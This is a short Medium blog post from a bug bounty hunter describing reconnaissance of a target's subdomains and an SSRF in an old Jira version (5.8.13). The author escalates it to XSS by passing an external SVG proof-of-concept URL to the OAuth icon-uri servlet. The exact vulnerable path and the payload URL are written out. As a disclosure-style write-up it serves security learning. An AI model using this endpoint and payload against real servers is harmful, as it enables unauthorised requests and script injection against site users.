How i converted SSRF TO XSS in jira.

Ashish Kunwar
Jun 1, 2018 · 2 min read

I m very much into Bug Bounty and i spend my whole day doing this finding new and interesting stuff and kept on upgrading my recon techniques.

So this Site was random and has vast subdomains to test

domain *.example.com

so i used some sites to find subdomains

  1. FindSubdomains.com

2. DnsDumpster

3. virustotal

4. Acunetix mannual tool

Before i start Acunetix does Subdomain scans so just set the time out to 20 and you will get a really big list with banners and response headers. (it does the half of the work for you.)

Now, i been through lots of subdomains and i was specifically looking for any jira environment , and i found one.

lets say wiki.example.com

so i looked at the version and it was “5.8.13” ,which is affected to ssrf ……

I remember the “Alyssa Herrera” writeup on “Piercing the Veil: Server Side Request Forgery to NIPRNet access

so i quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And Boom i got the google page and i m like

Hell Yea !

So i followed the writeup but couldn’t managed to get any sensitive info .

[Yes i tried everything ..nothing worked.]

And that’s where i was like “why god?” why ?

why God?

and then suddenly it came to my mind and i went to brute xss blog

copied “http://brutelogic.com.br/poc.svg” , and put it place of https://google.com

and boom , i got XSS

ssrf to XSS in #Vain

So it worked and i got bounty of 50$ which is less (and that company sucks)

Anyways it doesn’t matter at all , it was all about exploration and learning new things and gain experience.

#sharing is #caring

Hope you guys enjoyed it and learned something new. #[For who doesn’t know ,rest are leets].

Thank you

./Logout

follow me on twitter: Ashish Kunwar

and if you have any questions DM is open only for followers.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store